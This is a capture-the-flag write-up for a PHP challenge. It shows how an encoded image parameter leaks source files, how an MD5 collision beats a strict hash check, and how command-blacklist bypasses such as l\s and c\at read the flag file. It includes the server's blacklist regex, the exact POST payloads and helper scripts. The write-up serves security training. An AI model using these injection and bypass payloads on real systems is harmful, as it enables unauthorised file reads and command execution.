Open the challenge environment.
The page source contains nothing but "md5 is funny".
The URL carries img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=
Template injection does not work, PHP stream wrappers (pseudo-protocols) do not work either, and directory brute-forcing turns up nothing.
So the next step is to decode the image parameter:
TXpVek5UTTFNbVUzTURabE5qYz0
Two rounds of base64 decoding give
3535352e706e67
and converting the hex to a string gives
555.png
This looks like the entry point,
so let's use it:
read flag.php directly through this parameter.
First hex-encode the file name,
then base64-encode it twice:
TmpZMll6WXhOamN5WlRjd05qZzNNQT09
Submit it.
There is a response, so the approach is right, but the keyword is apparently filtered.
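The encode and decode steps above, as an added Python helper (not from the original writeup). It mirrors the transformation the challenge applies, hex2bin(base64_decode(base64_decode(img))), and handles the one detail that bites in practice: PHP's base64_decode() accepts the unpadded value the challenge URL carries, Python's does not. The two tokens from this page are the test values.

```python
import base64
import binascii


def encode_img(filename: str) -> str:
    """filename -> hex -> base64 -> base64, i.e. the inverse of what index.php does."""
    hex_text = binascii.hexlify(filename.encode()).decode()
    once = base64.b64encode(hex_text.encode()).decode()
    return base64.b64encode(once.encode()).decode()


def _b64decode_lenient(text: str) -> bytes:
    # PHP's base64_decode() tolerates missing "=" padding (the img value in the
    # challenge URL has its trailing "=" dropped); Python's does not, so re-pad.
    return base64.b64decode(text + "=" * (-len(text) % 4))


def decode_img(token: str) -> str:
    """base64 -> base64 -> hex -> filename, matching hex2bin(base64_decode(base64_decode()))."""
    once = _b64decode_lenient(token).decode()
    hex_text = _b64decode_lenient(once).decode()
    return binascii.unhexlify(hex_text).decode()


if __name__ == "__main__":
    print(decode_img("TXpVek5UTTFNbVUzTURabE5qYz0"))  # 555.png
    print(encode_img("flag.php"))                     # TmpZMll6WXhOamN5WlRjd05qZzNNQT09
    print(encode_img("index.php"))
```

When the encoder output ends in "=", either drop it (the server re-pads) or send it as %3D; a raw "=" in a query string is harmless here but is easy to mangle in a proxy.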
So try reading other files. hint.php first:
nothing useful.
Then index.php:
it does return content.
Base64-decoding the payload of the returned data: URI gives the source:
<?php
// Note: "||" is boolean OR, so this is error_reporting(1), i.e. E_ERROR only;
// warnings from file_get_contents() on a bad name are never shown.
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd']))
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
// img: base64 -> base64 -> hex -> file name
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));
// only [a-zA-Z0-9.] survive, so "/" is stripped and no other directory is reachable
$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
    echo '<img src ="./ctf3.jpeg">';
    die("xixi~ no flag");
} else {
    // the file is returned base64-encoded inside a data: URI
    $txt = base64_encode(file_get_contents($file));
    echo "<img src='data:image/gif;base64," . $txt . "'></img>";
    echo "<br>";
}
echo $cmd;
echo "<br>";
// command blacklist
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
} else {
    // both values are cast to string, and the md5 comparison is strict
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}
?>
The important part is this line:
if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b']))
Both values are cast to string, so the usual a[]=1&b[]=2 array trick fails (both become "Array" and are no longer unequal), and the md5 comparison uses ===, so "0e..." magic-hash values do not help either: two genuinely different strings with the same MD5 are needed.
I covered this in an earlier blog post;
the collision is generated with fastcoll, as explained in that article.
Verify it locally:
<?php
// read a file as raw bytes (the fastcoll outputs are binary)
function readmyfile($path) {
    $fh = fopen($path, "rb");
    $data = fread($fh, filesize($path));
    fclose($fh);
    return $data;
}
// same test as index.php: 1 = same MD5 but different strings (bypass works),
// 2 = the files are identical, 3 = no collision
if (md5(readmyfile("1.txt")) === md5(readmyfile("2.txt"))) {
    if ((string)readmyfile("1.txt") !== (string)readmyfile("2.txt"))
        echo 1;
    else
        echo 2;
} else
    echo 3;
The output is 1, so the bypass works.
Next, URL-encode the two files so they can be sent as POST parameters a and b:
<?php
function readmyfile($path) {
    $fh = fopen($path, "rb");
    $data = fread($fh, filesize($path));
    fclose($fh);
    return $data;
}
// urlencode() turns the binary blocks into something that fits in a POST body
echo urlencode(readmyfile("1.txt"));
echo '============================';
echo urlencode(readmyfile("2.txt"));
a=123%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%14%9E%C7%E6G%D6%06%8Bq%3B%AC%93z%1E%FAz%0B%FC%F8%A2%DDX%2FN%03%CAv%A6%2C%2A%16%0B%9B%DD%F8%CB%CA%07%E8%FD%0Bd%F1%9B%3BD%8EI%C7v.%5Db%2C%CDIV%FB%F3%C0%3B1%FD%CB%81NL%14%A5%0F%13%FD%A7%E9%B7%F1Cx%27E%1A%F0%A0%3B%17%F5+b%C1%D7%F5%CC%CD%29%5D.%F5%60%9E%FE%3EJ%AF%16%D3%83%BD%AF%A0-mJ%CE%D3%9B%DF%08%99%F41%22%D7%1E%7E%F4%28%99%7B&&b=123%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%14%9E%C7%E6G%D6%06%8Bq%3B%AC%93z%1E%FAz%0B%FC%F8%22%DDX%2FN%03%CAv%A6%2C%2A%16%0B%9B%DD%F8%CB%CA%07%E8%FD%0Bd%F1%9B%3B%C4%8EI%C7v.%5Db%2C%CDIV%FB%F3%40%3B1%FD%CB%81NL%14%A5%0F%13%FD%A7%E9%B7%F1Cx%27E%1A%F0%A0%BB%17%F5+b%C1%D7%F5%CC%CD%29%5D.%F5%60%9E%FE%3EJ%AF%16%D3%83%BD%AF%A0%ADlJ%CE%D3%9B%DF%08%99%F41%22%D7%1E%FE%F4%28%99%7B
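An added check (not part of the original writeup) that the two url-encoded values above really satisfy the condition index.php evaluates, written in Python so it can be run without PHP. The values are the ones from this page; the run of 61 %00 bytes is written as a repeat count (the fastcoll prefix "123" zero-padded to one 64-byte block, followed by the two 64-byte collision blocks). The one thing to get right is form decoding: urlencode() emitted a "+" for a 0x20 byte inside the second block, and PHP turns it back into a space when it parses the POST body, so a decoder that leaves the "+" alone quietly breaks the collision.

```python
import hashlib
from urllib.parse import unquote_to_bytes

# The two url-encoded POST values from the writeup: "123", zero padding to a
# 64-byte block boundary, then the two fastcoll collision blocks.
_ZEROS = "%00" * 61
A_ENC = ("123" + _ZEROS
         + "%14%9E%C7%E6G%D6%06%8Bq%3B%AC%93z%1E%FAz%0B%FC%F8%A2%DDX%2FN%03%CAv%A6%2C%2A%16%0B%9B%DD%F8%CB%CA%07%E8%FD%0Bd%F1%9B%3BD%8EI%C7v.%5Db%2C%CDIV%FB%F3%C0%3B1%FD%CB%81NL%14%A5%0F%13%FD%A7%E9%B7%F1Cx%27E%1A%F0%A0%3B%17%F5+b%C1%D7%F5%CC%CD%29%5D.%F5%60%9E%FE%3EJ%AF%16%D3%83%BD%AF%A0-mJ%CE%D3%9B%DF%08%99%F41%22%D7%1E%7E%F4%28%99%7B")
B_ENC = ("123" + _ZEROS
         + "%14%9E%C7%E6G%D6%06%8Bq%3B%AC%93z%1E%FAz%0B%FC%F8%22%DDX%2FN%03%CAv%A6%2C%2A%16%0B%9B%DD%F8%CB%CA%07%E8%FD%0Bd%F1%9B%3B%C4%8EI%C7v.%5Db%2C%CDIV%FB%F3%40%3B1%FD%CB%81NL%14%A5%0F%13%FD%A7%E9%B7%F1Cx%27E%1A%F0%A0%BB%17%F5+b%C1%D7%F5%CC%CD%29%5D.%F5%60%9E%FE%3EJ%AF%16%D3%83%BD%AF%A0%ADlJ%CE%D3%9B%DF%08%99%F41%22%D7%1E%FE%F4%28%99%7B")


def decode_form_value(encoded: str) -> bytes:
    """Decode one value the way PHP parses application/x-www-form-urlencoded.

    "+" means a space (urlencode() emits it for 0x20). unquote_to_bytes() on
    its own would keep a literal 0x2B inside the block and break the collision.
    """
    return unquote_to_bytes(encoded.replace("+", " "))


def passes_md5_check(a: bytes, b: bytes) -> bool:
    """The condition index.php evaluates: (string)a !== (string)b && md5(a) === md5(b)."""
    return a != b and hashlib.md5(a).hexdigest() == hashlib.md5(b).hexdigest()


def differing_bytes(a: bytes, b: bytes):
    """(offset, a_byte XOR b_byte) for every position where the two inputs differ."""
    return [(i, x ^ y) for i, (x, y) in enumerate(zip(a, b)) if x != y]


def post_body() -> str:
    """The exact body to send (Content-Type: application/x-www-form-urlencoded)."""
    return "a=" + A_ENC + "&b=" + B_ENC


if __name__ == "__main__":
    a, b = decode_form_value(A_ENC), decode_form_value(B_ENC)
    print(len(a), hashlib.md5(a).hexdigest())
    print(len(b), hashlib.md5(b).hexdigest())
    print(passes_md5_check(a, b), differing_bytes(a, b))
```

The differing bytes all sit in the last 128 bytes, six of them flipped in their top bit and one neighbouring byte changed by a borrow, which is the shape of a fastcoll two-block collision; the "123" prefix is arbitrary and any prefix that is a whole number of 64-byte blocks could be used instead, as long as the collision is regenerated for it.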
The cmd parameter is heavily filtered,
but dir is not on the list and can be used as is.
The ls filter can be bypassed by writing it as l\s.
First list the current directory:
the bypass works,
which also confirms that the md5 collision was accepted.
Then list the root directory.
A literal space in the request line breaks the request in Burp, so the space is sent as %20 (a plain space is not in the blacklist; only tab, CR, LF and 0xA0 are), and ls is split with a backslash: l\s%20/
dir%20/
or l\s%20/
This reveals the flag file.
So c\at%20/f\l\a\g
returns the flag.
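An added example, not part of the original writeup: a Python port of the two server-side checks in the index.php dump above, so candidate img names and cmd payloads can be tried offline before they are sent. It is hand-translated from the dump (assumption: the deployed file is identical to it). Read as a PHP double-quoted literal, the dump's \\|\\\\ escapes put a literal backslash into the PCRE pattern, and the port keeps that; the writeup reports l\s and c\at getting through on the live target, so that one case is left to be confirmed against the target and is not asserted here.

```python
import re

# img: after hex2bin(base64_decode(base64_decode())), everything outside
# [a-zA-Z0-9.] is stripped, then any "flag" (case-insensitive) is refused.
IMG_STRIP = re.compile(r"[^a-zA-Z0-9.]+")
FLAG_RE = re.compile(r"flag", re.IGNORECASE)


def img_check(decoded_name: str):
    """Return (name index.php actually opens, allowed) for a decoded img value."""
    cleaned = IMG_STRIP.sub("", decoded_name)
    return cleaned, FLAG_RE.search(cleaned) is None


# cmd: the blacklist as the double-quoted PHP literal evaluates to a PCRE
# pattern. \n \t \r \xA0 become real characters, "\\" becomes one backslash,
# the duplicated {|} and \(|\) alternatives are folded, the rest are literals.
CMD_BLACKLIST = re.compile(
    r"ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless"
    r"|pcre|paste|diff|file|echo|sh|'|\"|`|;|,|\*|\?|\||\\|\n|\t|\r|\xA0"
    r"|\{|\}|\(|\)|&[^\d]|@|\$|\[|\]|-|<|>",
    re.IGNORECASE,
)


def cmd_allowed(cmd: str) -> bool:
    """True if index.php would get past the blacklist to the md5 check (and backticks)."""
    return CMD_BLACKLIST.search(cmd) is None


if __name__ == "__main__":
    for name in ("555.png", "index.php", "flag.php", "../flag", "/etc/passwd"):
        print(repr(name), "->", img_check(name))
    for cmd in ("ls", "dir", "dir /", "cat /flag", "dir${IFS}/", "dir;id"):
        print(repr(cmd), "->", "allowed" if cmd_allowed(cmd) else "forbid ~")
```

Two things the port makes visible: the img sanitizer removes "/" before the name is opened, so only a flat file name in the web root can ever be read (which is why index.php works and /etc/passwd cannot), and the cmd blacklist does not contain a plain space, so %20 is a usable separator while tab, ${IFS} and ; are not.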
Hope this article helps you!
Reposted from: https://blog.csdn.net/qq_53460654/article/details/117226102